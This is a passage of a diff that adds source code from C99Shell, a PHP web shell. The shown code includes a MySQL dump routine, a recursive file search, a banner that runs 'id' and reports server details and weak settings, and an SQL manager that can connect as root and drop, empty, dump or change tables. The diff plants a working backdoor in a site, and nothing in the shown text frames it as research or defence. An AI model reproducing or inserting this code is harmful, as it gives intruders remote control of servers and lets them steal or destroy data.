TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode 